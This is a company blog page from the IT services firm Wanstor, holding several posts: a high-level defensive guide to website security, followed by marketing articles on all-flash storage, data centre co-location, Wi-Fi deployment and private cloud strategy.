A blog on Website Security

22nd February 2018
|

At Wanstor this week, we have been discussing website security. This is because of news that the Information Commissioner’s Office or ICO had to take its website down after a warning that hackers were taking control of visitor’s computers to mine cryptocurrency.

Following this story, some of our customers have been in contact regarding website security and suggested best practices. In light of this, Wanstor’s security experts have come together to develop the following high level guide to website security.

You may not think your website has anything worth hacking, but corporate websites are compromised all the time. Despite what people think, the majority of website security breaches are not to steal data or deface a website. Instead they are hacked to use servers as an email relay for spam, or to setup a temporary web server, normally to serve files of an illegal nature. Other common ways to abuse compromised machines include using your company servers as part of a botnet, or to mine for Bitcoins. You could even be hit by ransomware. Hacking is regularly performed by automated scripts written to scour the Internet in an attempt to exploit known website security issues in software. By following the tips below, your website should be able to operate in a safer way and put hackers and the tools they use off from attack.

Keep software updated

It may seem obvious, but making sure you keep all software updated is vital to keeping your site secure. This applies to both the server operating system and to any software you may be running on your website such as a CMS or forum. When holes are found in website security software, hackers are quick to attempt abuse. If you are using a managed hosting solution, then your hosting company should take care of any updates, so you do not need to worry about this – unless your hosting company contacts you to tell you to worry!

If you are using third-party software on your website such as a CMS or forum, you should make sure you are quick to apply any security patches. Most vendors have a mailing list or RSS feed detailing any website security issues.  Many developers use tools like Composer, npm, or RubyGems to manage their software dependencies, and security vulnerabilities appearing in a package you depend upon but aren’t paying any attention to is one of the easiest ways to get caught out. Make sure you keep your dependencies up to date and use relevant tools to get automatic notifications when a vulnerability is announced in one of your components.

SQL injection

SQL injection attacks occur when attackers use a web form field or URL parameter to gain access to or manipulate your database. When you use standard Transact SQL, it is easy for such individuals to insert rogue code into your query that could be used to change tables, retrieve information and delete data. You can easily prevent this by always using parameterised queries – most web languages have this feature and it is easy to implement.

XSS

Cross-site scripting (XSS) attacks inject malicious JavaScript into your pages, which then runs in the browsers of your users, allowing page content to be modified or information to be stolen or transmitted to the attacker. For example, if you show comments on a page without validation, attackers might submit comments containing script tags and JavaScript, which could run in every other user’s browser and steal their login cookie, allowing the attacker to take control of accounts owned by each user who views the comment. You need to ensure that users cannot inject active JavaScript content into your pages.

The key here is to focus on how your user-generated content could escape the bounds you expect and be interpreted by the browser as something other than what you intended. This is similar to defending against SQL injection. When dynamically generating HTML, use functions which explicitly make the changes you’re looking for, or use functions in your templating tool that automatically ensure appropriate escaping, rather than concatenating strings or setting raw HTML content.

Another powerful tool in the XSS defender’s toolbox is Content Security Policy (CSP). CSP is a header your server can return which tells the browser to limit how and what JavaScript is executed in the page, for example to disallow running of any scripts not hosted on your domain, disallow inline JavaScript. Mozilla have an excellent guide with some example configurations. This makes it harder for an attacker’s scripts to work, even if they can get them into your page.

Error messages

Be careful with how much information you give away in error messages. Provide only minimal errors to your users, to make sure they do not leak secrets present on your server. Although tempting, do not provide full exception details either, as these can make complex attacks like SQL injection far easier. Keep detailed errors in your server logs, and show users only the information they need to see.

Server side validation

Validation should always be done both on the browser and server side. The browser can catch simple failures like mandatory fields which are empty and when you enter text into a numbers only field. These can however be bypassed, and you should make sure you check for these validation and deeper validation server side as failing to do so could lead to malicious code or scripting code being inserted into the database or could cause undesirable results in your website.

Passwords

Everyone knows they should use complex passwords, but that doesn’t mean they always do. It is crucial to use strong passwords to your server and website admin area, but equally also important to insist on good password practices for your users to protect the security of their accounts. As much as users may not like it, enforcing password requirements such as a minimum of around eight characters, including an uppercase letter and number will help to protect their information in the long run. Passwords should always be stored as encrypted values, preferably using a one way hashing algorithm. Using this method means when you are authenticating users you are only ever comparing encrypted values.

In the event of someone hacking in and stealing your passwords, using hashed passwords could help damage limitation, as decrypting them is not possible. The best someone can do is a dictionary attack or brute force attack, essentially guessing every combination until it finds a match.

Thankfully, many CMS’s provide user management out of the box with a lot of these website security features built in, although some configuration or extra modules might be required to use to set the minimum password strength. If you are using .NET then its worth using membership providers as they are very configurable, provide inbuilt website security and include readymade controls for login and password reset.

File uploads

Allowing users to upload files to your website can be a significant website security risk, even if it’s simply to change their photo, background picture or avatar. The risk is that any file uploaded however innocent it may look, could contain a script that when executed on your server completely opens up your website. If you have a file upload form then you need to treat all files with great suspicion. If you are allowing users to upload images, you cannot rely on the file extension or the mime type to verify that the file is an image as these can easily be faked. Even opening the file and reading the header, or using functions to check the image size are not fool proof. Most images formats allow storing a comment section which could contain PHP code that could be executed by the server.

So what can you do to prevent this? Ultimately you want to stop users from being able to execute any file they upload. By default web servers won’t attempt to execute files with image extensions, but it isn’t recommended to rely solely on checking the file extension as a file with the name image.jpg.php has been known to get through. Some options are to rename the file on upload to make sure ensure the correct file extension, or to change the file permissions so it can’t be executed.

In Wanstor’s opinion, the recommended solution is to prevent direct access to uploaded files. This way, any files uploaded to your website are stored in a folder outside of the webroot or in the database as a blob. If your files are not directly accessible you will need to create a script to fetch the files from the private folder (or an HTTP handler in .NET) and deliver them to the browser. Image tags support an src attribute that is not a direct URL to an image, so your src attribute can point to your file delivery script providing you set the correct content type in the HTTP header.

The majority of hosting providers deal with the server configuration for you, but if you are hosting your website on your own server then there are few things you will want to check. E.g. Make sure you have a firewall setup, and are blocking all non-essential ports.

If you are allowing files to be uploaded from the Internet only use secure transport methods to your server such as SFTP or SSH. Where possible have your database running on a different server to that of your web server. Doing this means the database server cannot be accessed directly from the outside world, only your web server can access it, minimising the risk of your data being exposed. Finally, don’t forget about restricting physical access to your server.

HTTPS

HTTPS is a protocol used to provide security over the Internet. HTTPS guarantees users that they’re communicating with the server that they should be, and that nobody else can intercept or modify the content in transit. If you have anything that your users might want to remain private, it’s highly advisable to use only HTTPS in delivering it. That of course means credit card and login pages. A login form will often set a cookie for example, which is sent with every other request to your site that a logged in user makes, and is used to authenticate those requests. An attacker stealing this would be able to perfectly imitate a user and take over their login session. To defeat these kind of attacks, you almost always want to use HTTPS for your entire site.

Website security tools

Once you think you have done all you can, then it’s time to test your website security. The most effective way of doing this is via website security tools, often referred to as penetration testing or pen testing for short. There are many commercial and free products to assist you in this. They work on a similar basis to scripts hackers will use in that they test all know exploits and attempt to compromise your site using some of the previous mentioned methods such as SQL injection.

Some free tools that are worth looking at include:

  • Netsparker (Free community edition and trial version available). Good for testing SQL injection and XSS.
  • OpenVAS claims to be the most advanced open source security scanner. Good for testing known vulnerabilities, currently scans over 25,000. But it can be difficult to setup and requires a OpenVAS server to be installed which only runs on *nix. OpenVAS was fork of Nessus before it became a closed-source commercial product.
  • io is a tool offering a free online check to quickly report which security headers mentioned above (such as CSP and HSTS) a domain has enabled and correctly configured.
  • Xenotix XSS Exploit Framework is a tool from OWASP (Open Web Application Security Project) that includes a huge selection of XSS attack examples, which you can run to quickly confirm whether your site’s inputs are vulnerable in Chrome, Firefox and IE.

The results from automated tests can be daunting, as they present a wealth of potential issues. The important thing is to focus on the critical issues first. Each issue reported normally comes with a good explanation of the potential vulnerability. You will probably find that some of the issues rated as low or medium in importance aren’t a concern for your site. If you wish to take things a step further then there are some further steps you can take to manually try to compromise your site by altering POST/GET values. A debugging proxy can assist you here as it allows you to intercept the values of an HTTP request between your browser and the server. A popular freeware application called Fiddler is a good starting point.

So what should you be trying to alter on the request? If you have pages which should only be visible to a logged in user then try changing URL parameters such as user id, or cookie values in an attempt to view details of another user. Another area worth testing are forms, changing the POST values to attempt to submit code to perform XSS or to upload a server side script.

Hopefully these tips will help keep your site and information safe. Thankfully most Content Management Systems have inbuilt website security features; it is a still a good idea to have knowledge of the most common security exploits, so you can make sure that you are covered.

For more information about Wanstor’s IT security solutions, please click here – https://www.wanstor.com/managed-it-security-services-business.htm

Read More

Why flash storage is so important to the success of hybrid IT infrastructure

9th February 2018
|

Why flash storage is so important to the success of hybrid IT infrastructure

IT leaders are facing critical decisions on how to best deploy data centre and cloud resources to enable digital transformation. The advantages of cloud models have been written about by many IT industry commentators, experts and opinion makers. Understandably, cloud computing is fundamental to delivering the agility, cost efficiencies and simplified operations necessary for modern IT workloads and applications at scale. However the truth is, even in today’s cloud era, IT leaders still need their own IT infrastructure and data centres to make IT work for their business.

At Wanstor, we believe that today and tomorrow’s data centres must support new models for resource pooling, self-service delivery, metering, elastic scalability and automatic chargebacks. They must deliver performance and agility that the business needs. No longer is it good enough to blame legacy IT equipment for standing in the way of business progress. IT departments must make sure they reduce complexity by leveraging technologies and architectures that are simple to deploy and manage. They must achieve levels of automation, orchestration and scalability that are not possible within data centres that operate on their own.

At Wanstor we have been thinking about the future of the data centre. We believe many IT departments are missing the fundamental question when seeking answers to their existing infrastructure plans and that is:

How does the data storage strategy integrate within existing and future company owned IT infrastructure and public cloud infrastructures?

At Wanstor we believe the answer to the “storage strategy” question can be found in a storage strategy that encompasses all flash and no longer relies on cumbersome disks and tapes. All-flash storage is the single most important change an IT Manager will need to make to successfully build their future hybrid infrastructure model. Without a flexible and scalable all-flash storage architecture the future data centre and hybrid cloud model actually fails. The performance, cost efficiencies, simplicity, agility and scalability the modern IT department will need to successfully serve their business cannot be achieved without all-flash storage as the infrastructure foundation.

So how do IT Managers leverage the benefits of all-flash storage to build a service-centric data storage infrastructure required for their business? What are some of the innovations in pricing models and all-flash storage architectures that will help them create a cost-efficient, scalable, resilient and reliable hybrid IT infrastructure?

The first thing IT Managers need to recognise is that moving to all-flash storage for a truly hybrid IT infrastructure is not just simply taking an extra step and buying some more kit nor is it rip everything out and start all over again. Instead it is an iterative process that will take place over a period of time depending on how mature a business’s IT infrastructure model is at the moment and what needs to be delivered by IT for business success in the future.

Migrating applications onto all flash storage

If you are an IT decision maker, you realise that your business has probably spent a quite a bit of budget and a significant amount of effort to make sure business critical applications are supported by an underlying IT infrastructure that is reliable, robust and resilient. Indeed you are probably beginning to experience performance challenges with a range of applications, particularly those that require high levels of IOPS. But applications and workloads that might see incremental improvements through faster, more responsive storage are unlikely to be the first place where IT will deploy all-flash systems. Instead, the IT Manager is likely to have specific applications and workloads where the performance challenges of spinning disk storage are difficult to overcome and the underlying storage infrastructure needs to be modernised instead to avoid putting the business at risk. Typical applications and workloads at this stage include databases supporting online transaction processing solutions for e-commerce, infrastructures supporting DevOps teams, and applications that are specific to a particular industry, which require levels of performance that traditional disk storage simply cannot deliver.

To understand which applications should be moved to all-flash storage first, it is important to do three things:

Understand the businesses own requirements for data storage, applications and budget considerations, and identify those workloads that are causing the most pain or providing the best opportunity to use all-flash storage to drive measurable business improvements.

Evaluate the benefits of all-flash storage solutions and how they can be applied to enhance and strengthen particular applications and workloads.

Compare leading all-flash solutions and determine which features, functions and pricing models will maximize the IT department’s ability to modernise workloads and begin a journey to an IT infrastructure model based around flash storage.

When evaluating the benefits of all flash storage, Wanstor believes IT Managers should consider the following critical factors:

Performance – All-flash storage will deliver performance that is at least 10 times greater than that of traditional disks. When thinking about performance, do not focus solely on IOPS; it is also about consistent performance at low latency. Make sure an all flash architecture is deployed that delivers consistent performance across all workloads and I/O sizes, particularly if starting with multiple workloads.

Total Cost of Ownership – The price of flash storage has come down dramatically in the past 12 months. If the IT and finance teams looked at flash several years ago and were scared off by the price, it is time to explore flash storage again. In fact some all flash storage providers have prices as low as £1k per TB of data.

Smaller storage footprint – This will happen through inline de-duplication and compression, along with thin provisioning, space-efficient snapshots and clones. In some cases the storage footprint can be reduced by a ratio of 5:1, depending upon the application and workload.

Lower operational overheads – Through faster more simple deployments, provisioning and scaling and cost savings as less manual maintenance is required.

Availability and resiliency – All-flash arrays utilise a stateless controller architecture that separates the I/O processing plane from the persistent data storage plane. This architecture provides high availability (greater than 99.999%) and non-disruptive operations. The IT Manager can update hardware and software and expand capacity without reconfiguring applications, hosts or I/O networks, without disrupting applications or sacrificing performance of the hardware.

Simpler IT operations – Many all-flash arrays are now plug and play, so simple that they can be installed in less than hour in many cases. Additionally storage administrators do not have to worry about configuration tuning and tweaking, saving hours or days of effort and associated expenses.

Consolidation – The next stage of moving more applications to flash storage

Once you have put your first applications on an all-flash storage array, the improvements in performance should be enough for the IT and finance teams to decide to invest further in the technology and really accelerate their journey to a flash storage based IT infrastructure.

Most IT leaders, will want to expand the benefits they will have seen from the initial deployment of flash storage to additional applications and workloads across the data centre. As the all-flash storage solution expands to additional applications, IT Managers will find that TCO benefits increase substantially. Because all-flash storage supports mixed workloads, IT Managers will be able to consolidate more applications on fewer devices, thus reducing IT infrastructure capital expenditure. By consolidating, IT Managers will also be able to maximize many of the cost savings mentioned earlier in this article (lower energy consumption, less floor space use, reduced software licensing fees etc).

In dense mixed workload applications, the TCO of using a flash storage solution will typically be 50% to 70% lower than a comparably configured traditional disk solution. Beyond the specific cost savings, the performance gains across more applications will drive significant business improvements and new opportunities. Resulting in a more agile IT infrastructure.

Additionally, the right all-flash storage architecture will help future-proof storage infrastructure, so that the investments being made today will continue to provide value as all flash storage usage is expanded across the business.

Building a business ready cloud on all flash storage

What do IT departments want and need from their cloud infrastructures? How can they leverage the cost savings and agility of the public cloud model, and link it to the control, security, data protection and peace of mind which can be achieved with an on-premises cloud infrastructure?

From Wanstor’s recent experiences many IT Managers want it all when it comes to cloud computing. They want to be able to provide all the features, functions and flexibility available from the leading public cloud service providers within their own IT infrastructure constraints. For many IT departments deploying cloud models similar to the big 3 cloud providers in a private cloud environment is simply unrealistic as the big 3 public cloud operators have lots of cash, resources and availability in terms of their infrastructure platforms.

If the IT department is unable to provide a better alternative to a public cloud solution, it is highly likely users within a business will feel the need to go to the public cloud. This creates a fertile ground for shadow IT initiatives that can cause security problems and other risks.

Beyond delivering public cloud-like features and functionality for an IT infrastructure solution, the IT department may also want to improve in areas where the public cloud may fall short. Performance is an example of this – If you want to use cloud services to support high-performance computing or big data analytics or some of the other important next-generation IT initiatives, it is likely the IT team will have to pay a premium to a public cloud service provider to match the businesses requirements.

Security is another critical area where building your own cloud infrastructure will give the IT department much greater control and peace of mind, particularly as they begin thinking about supporting the most important business applications and data in the cloud. As the IT department moves from the first all-flash applications through consolidation and toward the all flash cloud, an important step will be to bridge the virtualization gap between servers and the rest of the IT infrastructure, namely storage and networking.

To deliver a basic cloud-type service based on a flash storage platform, IT’s list of wants must include:

Shared resources through automated processes – Users should be able to go straight to an on-premises cloud and choose the storage capacity and performance they need, for as long as they need it.

Automated metering and charging – Once users have chosen the resources they want, the cloud infrastructure should be able to meter their usage and create an automated chargeback mechanism so they pay for what they actually used.

Scalability – Once resources are used, they go back into the pool and become available to other users and departments. As storage capacity and performance requirements grow, the storage platform should be simple to upgrade, update and scale. With virtualization across servers, storage and networking, an all-flash storage array becomes the foundation for a cloud infrastructure.

In this article we have discussed all-flash storage and the foundation it provides for a truly hybrid IT infrastructure to take place. Without the benefits of all-flash storage businesses will not be able to modernise their infrastructures to deliver cloud services. It is no coincidence that the largest cloud providers rely on all-flash storage solutions as their storage foundation. As discussed you can take the journey in stages, starting small with a single application or two, and then adding more applications through consolidation and virtualization. You can also implement multiple stages at once. Or you can do everything at once with all-flash storage solutions.

At Wanstor we believe the time for flash storage is now. The technology is great and at a price point where most businesses will see a return on their storage investments within 12 months due to the improved performance they receive across their business operations.

For more information about flash storage and how Wanstor can help your business with its IT infrastructure strategy and storage platforms, please visit https://www.wanstor.com/data-centre-storage-business.htm

Read More

Is your data centre under capacity and cost pressures? A co-location strategy may provide the answer

25th January 2018
|

Is your private cloud strategy really working? What is your framework for success?

For many businesses, the data centre is critical to a successful day-to-day operation. But data centres are under pressure with not only the volume of data they have to store and process for a business but also rising power costs, new environmental responsibilities which need to be adhered to, data centre technologies evolving rapidly, and escalating costs of security, cooling, connectivity, management and maintenance. This means for many businesses when they reach a certain capacity in their data centre the IT department can no longer simply ask finance for the funds to build another one. Instead they need to explore other options and usually it comes down to a choice of two things – retrofit the existing data centre or switch to a co-location provider.
At Wanstor we understand for many businesses there are a number of ‘non-negotiables’ when it comes to the performance of their data centres.

Maintaining stable, secure power – Evolving technologies and changing service requirements affect power and cooling demands. Today’s data centre energy costs are substantial. At Wanstor we have seen some customers spending upwards of 70% of their operational costs just to keep an existing data centre operation running smoothly. Finding a way to control those costs is often a significant driver for businesses to move to hosted data centre solutions.

Redundancy and reliability – Most data centres have backup options for power in case of outages (UPS and a diesel generator). Many businesses spend a lot of time having to upgrade these assets each year to make sure they are in line with their data centres’ changing power requirements.

Keeping data safe – At Wanstor we believe data can be used in a variety of ways to transform a business, but how it is stored, managed and maintained means there is another side to it – RISK. Privacy has to be protected. Confidential information must be safeguarded. Industry compliancy requirements, UK and EU regulations must be met. IT Managers need to know if their company’s data is stored on UK soil. Additionally the constant stream of new developments in IT and physical security due to the continued evolution of IT security threats means that many IT Managers are not confident their own data centres and systems are as secure as possible.

Growth vs Cost – Expand too quickly or too much and the IT Manager risks wasting resources. Limit growth and the IT Manager risks inhibiting a business’s potential. Building a brand-new data centre will give the IT Manager the flexibility to customise a build for their business. However the offset of all the advantages of a newly built data centre are usually wiped out by the finance team when they see the high costs of construction involved, the difficulties in selecting the right build partner and lack of appropriate locations. Indeed as so much is expected of modern day data centres only large enterprises appear to be building them in today’s market. This is backed by Forrester Research which estimates co-location is 37% less expensive than building your own data centre, based on costs over a 15-year period. This means for many small and medium sized companies, the only real solution available to them when they run out of data centre space is to outsource to a co-location provider.

Is hosting the right choice for your business?

For many small and medium sized businesses, moving to a hosted data centre model can be an effective way of offsetting the challenges associated with operating and maintaining their own data centre. At Wanstor we believe IT Managers should examine the types of questions below before deciding whether or not a hosting solution is the right choice for their business. The questions below should help an IT Manager gain a relatively quick view on insource vs outsource regarding their data centres after having answered these questions:

What are you looking to achieve with your data centre operations?

  • Address increasing power and cooling requirements?
  • Maximise uptime, availability and redundancy?
  • Keep technology up to date in an ever changing world?
  • Strengthen physical and data security?
  • Increase capacity whilst reducing power costs?
  • Investigate ways to optimise operational performance across systems and people?
  • Make sure IT teams are focussed on core business offerings?
  • Improve the efficiency and effectiveness of IT resource management and support?
  • Create a predictable cost model?
  • Reduce operational complexity and risk?

By defining what IT and the business wants to achieve with a new data centre, IT Managers can then scope the solution their business needs. Quite often when financial metrics are applied to outcomes IT Managers will conclude that outsourcing to a co-location provider is usually a third cheaper than building a new data centre themselves. This means in the majority of cases the decision will be made to outsource to a co-location provider.

Once the decision to outsource data centre operations to a co-location provider has been made, it is important for the IT Manager to take the time to understand the key characteristics of a dependable co-location data centre. At Wanstor we believe when evaluating a provider’s facilities, IT Managers need to take a close look at the data centre’s capabilities, strengths and potential weaknesses.

From our extensive experience at Wanstor we believe important questions to ask a potential co-location provider include:

What tier ranking is the facility designed to meet? Does your business really need a Tier 4 facility (which you pay a significant amount more for) or will a Tier 3 data centre suffice?

What is your downtime tolerance level and can the facility meet your businesses uptime needs? Remember downtime can affect your business – in terms of revenue, customer experience and brand image.

What security measures are in place? As hosted data centres share multiple customers, advanced security features should be in place including 24/7 x 365 on-site security, network security (intrusion detection, virtualized firewalls and load balancers), and the ability to monitor lines for traffic. At Wanstor we always recommend that IT Managers take the time to discover how much control a provider has over the network that will be delivering hosted data centre services. Additionally it would be wise to ask about managed protection against DDoS attacks, event management and any other security services essential to your business.

Scalability – What are the options? As a business grows, it will need more data centre space and scalable capacity. Additionally any hosted data centre facility that is chosen should be able to adopt new technologies quickly. Cloud services and fully-managed virtualized environments offer many businesses an opportunity to enhance scalability and refocus key IT resources on revenue generating activities. You may not need these services today, but having your data hosted is usually a long-term decision because moving is expensive and risky. So IT Managers need to think beyond the initial contract term and make sure they have room to grow, and some allowance to meet future needs.

Auditing – When transferring data and applications to a data centre, the IT department are also transferring compliance responsibilities. Therefore the IT Manager should check that their data centre provider has the relevant compliance certifications and ask for proof of them.

Power consumption model – Service reliability will depend on a co-location provider’s ability to measure, monitor and allocate power usage. In an over-subscription power allocation model, a single reading is used for the entire data centre. Unused power from one customer can be resold to another and spikes in power demand from other customers can drain your resources. In the power reservation model, you get the total capacity you’ve paid for, whether or not you use it. You’ll always have enough energy to run your systems, and close monitoring ensures the provider can quickly detect and respond to any increases in your demand. This prevents the situation where one customer has the ability to affect another customer’s environment.

What environmental initiatives are included? Integrated sustainable energy technology is good both for operational cost savings and the environment. Time should be taken to consider the co-location providers environmental track record, look for advancements such as virtualized environments, use of free cooling solutions and heat exchangers. All of these can be reliable, cost-effective alternatives to traditional technologies. Many service providers today aspire to improve their power usage effectiveness (PUE), an industry measure of energy efficiency. A service provider with good PUE will also help keep power costs down.

Connectivity – The network linking a provider’s data centres is a critical component of their offering. Data centres typically process large volumes of traffic, and the network that connects the data centres, to each other and to the business needs to sustain volumes reliably and securely at all times. The physical location of data centres is also important, as providers often space out their facilities to minimise the risk of a mass disruption. But many data centre applications are sensitive to latency. The further your data needs to travel, the more likely it is that delay may become an issue. Therefore evaluating the connectivity performance and options from a data co-location provider is crucial.

Beyond the characteristics of the data centre itself, the IT Manager will also want to be confident in a provider’s ability to meet business needs. Other questions the IT Manager should be asking alongside exploring the key areas above include:

What kind of network does the provider operate? How does the network cope with spikes in demand? What are the latency levels for different applications?

What kind of service-level agreements (SLAs) are offered? Are the hosting and connectivity service levels aligned and through the same provider. If they’re not aligned this could spell trouble as one service may operate better than the other leaving a range of performance issues.

Are professional services available to help with understanding technology options/upgrades? One size does not fit all. The right data centre provider will assess your needs, current capabilities and future plans, and will work with you to find a solution that meets your unique business goals.

Can services be scaled quickly and easily? IT needs will continue to evolve that is for certain and not always in ways the IT Manager can predict. Look for power and capacity that can be scaled quickly, giving you the energy, space and bandwidth you need to grow your business.

Does the provider offer virtual hosting and cloud solutions? Dedicating a server to each application and configuring it to handle peak loads can be inefficient. Moving your applications to a virtual server farm can help keep costs low and give you the advantage of architectural flexibility. Virtual solutions also scale up quickly and easily, without requiring the IT Manager to invest in any hardware. Look for a provider equipped with the latest virtual service offerings, such as Infrastructure as a Service (IaaS), which gives IT complete control over capacity and charges only for the services used.

Does the provider invest continually in infrastructure and cloud capabilities? One of the benefits of moving to a hosted data centre model is taking advantage of new technology. A good provider will constantly invest in upgrades and advances e.g. by integrating cloud capabilities or adopting the latest innovations in physical and data security.

Are costs predictable? Working with a data centre provider will give you access to a sophisticated infrastructure without incurring significant capital costs. Make sure the monthly costs associated with the hosted service are stable and predictable, challenge anything out of the norm such as unforeseen maintenance requirements for example.

This article should help IT Managers think about co-location data centre solutions when they are reaching the limits of their own data centre infrastructure. For more information about Wanstor data centre co-location services download our brochure here.

Read More

Getting Wi-Fi implementation right – some best practice tips

15th January 2018
|

Wi-Fi implementation - getting it right

Many businesses are failing to take advantage of their Wi-Fi deployments. At Wanstor, we are finding that it is the planning and implementation of Wi-Fi deployments that make or break a successful Wi-Fi solution. To set up a successful enterprise Wi-Fi solution, Wanstor has developed a set of best practices.

By following the practices below, we believe any business can quickly and efficiently replace wired LAN access services in existing workspaces and implement Wi-Fi in new locations. So what are the secrets to Wi-Fi deployment success?

  • Plan for the future – Quite often businesses only plan for Wi-Fi usage which will satisfy user demands today and not the future. This means that the investments in Wi-Fi will satisfy an immediate need, but as we have seen in many businesses Wi-Fi usage continues to grow at an exponential rate as video, voice and internet usage continues to grow. This means IT Managers should take the time to understand their businesses Wi-Fi usage needs now and those up to 3 years in the future to make sure a robust, reliable and ever ready Wi-Fi network is in place.
  • Start Incrementally with Proofs of Concept (PoCs), Staged Deployments, and Standardized Components – This will help you to evaluate where and when traffic is flowing from and if there are any problems with certain devices or areas in buildings
  • Design for the best possible end user experience – Make sure your Wi-Fi design takes into account user needs and the activities they are likely to be undertaking on the Wi-Fi network. For example is your Wi-Fi network set up so live video can be streamed, high data applications used and can cope with several devices connecting at once?
  • Employ Redundancy to ensure reliability, availability, and coverage – For better coverage and more reliable performance, we suggest businesses use a dual-redundant infrastructure that includes two clouds, two WLAN controllers per building, and two APs to cover every physical point in a building. This infrastructure will give more APs per location and fewer users per AP. Thus providing greater reliability and availability since there is no single point of failure. If any infrastructure component fails, any connecting wireless device will automatically roam to a neighboring AP, minimising interruption to the user.
  • Perform site surveys and verify coverage – To adapt a Wi-Fi solution to different types and sizes of buildings, it is strongly suggested the IT Manager invests some time in using an automated Wi-Fi planning tool. This will help to meet the following criteria:
  • Enable a 15 to 20 percent AP overlap
  • Locate APs for redundancy and dynamic power allocation
  • Serve 15 to 20 users per AP
  • Make sure small cells are available for VoIP service
  • Provide coverage of conference rooms and shared areas separate from employee office apps
  • Test the quality of service for voice and video demands – Quite often Wi-Fi solutions are deployed with IT Managers thinking users will only be accessing email and a couple of low data usage apps. Nothing could be further from the truth. Walk past any coffee shop and you will see people on phones and tablets, making calls, streaming films and uploading images to social networking sites. This means the Wi-Fi design has to have the right coverage and bandwidth to accommodate users needs at all times of the day.
  • Base Wireless Infrastructure on Wi – Fi controllers – Wi-Fi controllers allow IT administrators to create AP groups for geographical management and security as well as to implement special features. If a change needs to be made to the wireless configuration of an entire building, such as adding an SSID (service set identifier), the administrator can simply apply that change to the group through the Wi-Fi controller. Implementing centralised management through WLAN controllers also enhances security by enabling IT administrators to check logs, configure security settings, and implement group policies for wireless users all from one location. Wi-Fi controllers also make it easier to detect defective APs
  • Follow the FCAPS model – To monitor and manage wireless infrastructure, Wanstor uses an FCAPS (fault, configuration, accounting, performance, and security) management model:
  • For IT notifications of errors (faults), we use a management solution that classifies, and forwards Simple Network Management Protocol (SNMP) traps and event messages based on severity.
  • To reduce configuration time and effort, we use a generic global configuration template supplemented with a local configuration template where necessary. For simple, global updates, we standardise as much as possible on a single firmware solution for APs across the enterprise.
  • Accounting/performance. For network health, we monitor coverage, load, utilization, and uptime. Our troubleshooting capabilities include addressing single and multiple clients, depending on the extent of the issue. To enhance security, we configure the system to identify and alert us to rogue devices using unauthorized networks.
  • To enhance security, we configure the system to identify and alert us to rogue devices using unauthorized networks.
  • Set up a separate Wi-Fi channel for internet access by employee-owned devices – Employees want the flexibility to perform their jobs using the platforms, applications, online tools, and services they use on their own devices. To enable employee-owned devices in the enterprise, we suggest a business sets up a separate channel where employees can access Wi-Fi which does not impact on business only devices separated by different firewalls.
  • Define and control access by user type – In providing the right level of access for each user type (employee using a corporate-issued mobile business PC, employee using an employee owned device etc), use different Wi-Fi networks and standards.
  • Control access to data with authentication and role-based trust – Make all access to the Wi-Fi as secure as possible. Use technologies such as federation, multifactor authentication, and certificate services to control access to data by performing role-based trust calculations and managing access privileges appropriately.

By incorporating some of the best practices above into your Wi-Fi planning and deployment phase, Wanstor believes businesses will be better prepared to take advantage of everything a wireless infrastructure has to offer.

For more information about Wanstor’s Wi-Fi services click here.

Read More

Is your private cloud strategy really working? What is your framework for success?

22nd December 2017
|

Is your private cloud strategy really working? What is your framework for success?

Whether you want to take your IT operations to the public cloud, keep them on-premise, host off-premise using a private cloud model, or indeed choose to invest in a hybrid configuration, the IT Manager must start with a clear understanding of what they are trying to achieve from an IT and business perspective before embarking on their cloud journey.

This may seem like stating the obvious, but at Wanstor we have seen several cases recently where businesses have invested in cloud computing models without thinking about the outcomes they want from a cloud computing strategy.

It can be tempting to get caught up in debates and discussions about “cloud technology”, after all it is a major IT trend which lots of IT and business leaders are talking about in various online and offline publications. However just because something is a hot topic doesn’t mean the fundamental questions of business need are not addressed:

  • What are the key drivers for change?
  • Do we need to change?
  • Are we trying to reduce operational costs?
  • What do we need to do to improve the IT infrastructure environment to better support the business?
  • How can we make staff more productive through IT?
  • What is the right approach for achieving IT objectives over the next 12 months?

Obviously these are not simple questions with simple answers. As Wanstor has learned from our experience of working with 100’s of businesses across the UK on private cloud migration projects, the unique challenges of cloud computing require new ways of thinking, planning, and cross business collaboration to achieve common IT and business goals.

We’ve also seen that success can happen early in a cloud computing engagement by those IT leaders who are able to frame a realistic strategy at the beginning, which has definition and appreciation for the capabilities and limitations of the businesses they lead.

At Wanstor we say business decision makers need to have a “cloud frame of mind.” We believe a “cloud frame of mind” should be used to tackle the various strategic considerations required in a private cloud deployment project.

So let’s start at the beginning, what are you trying to do with your private cloud project?

Generally private clouds are invested in for one of 3 major business reasons:

Agility

  • Reduce time to market: Implement new business solutions quickly to accelerate revenue growth.
  • Better enable the solution development life cycle: Speed up business solutions through better development and test, and a fast path to production.
  • Be more responsive to business change: Deliver quickly on new requirements for existing business solutions.

Cost

  • Reduce operational costs: Optimize daily operational costs like people, power, and space.
  • Reduce capital costs or move to annuity-based operational costs: Benefit from reduced IT physical assets and more pay-peruse services.
  • Make IT costs transparent: Service consumers better understand what they are paying for.

Quality

  • Consistently deliver to better defined service levels: Better service leads to increased customer satisfaction.
  • Ensure continuity of service: Minimise service interruption.
  • Ensure regulatory compliance: Manage the compliance requirements that may increase in complexity with online services.

Where businesses locate their needs amongst these primary drivers and define their objectives as they consider their cloud computing options is a basic starting point in the process. For many in IT the private cloud is proving especially attractive, mainly for what it offers in terms of control over matters of security, data access, and regulatory compliance. Their primary interest in a private cloud architecture revolves around the pressures to cut costs without sacrificing control over essential data, core applications, or business-critical processes. The main secondary interests around private cloud computing are more to do with business growth and the possibilities it offers in terms of scaling workloads at different times of the year. This shows that IT leaders are beginning to think seriously about cloud computing as a way to turn IT into a business enabler rather than being seen as a costly department by other business unit leaders.

As identified above there are several drivers IT leaders are investigating as a means of reasoning to move workloads to a private cloud model. Once the IT leader has identified business needs and objectives, they should take the time to understand the capabilities, limitations, and complexities of their current IT environment, which starts by performing an analysis of technical and organisation maturity vs different capabilities of cloud computing. The next step is then to determine where you want to take your IT team and the business it is serving, and assessing the prerequisites for the desired objectives.

Many of the businesses we work with, start at a basic stage along their cloud optimisation journey. Usually they have already managed to consolidate infrastructure resources for better cost efficiencies through virtualization. If your business fits this profile, an acceptable outcome might be to advance your business to the next stage by implementing more sophisticated infrastructure level resource pooling, which would achieve still greater cost savings as well as a measure of improved time to market. Similarly, your current business capabilities may put you somewhere in the middle of the cloud maturity model, with a relatively high degree of sophistication in business areas you consider your top priorities, such as being able to respond to seasonal shifts in demand for example.

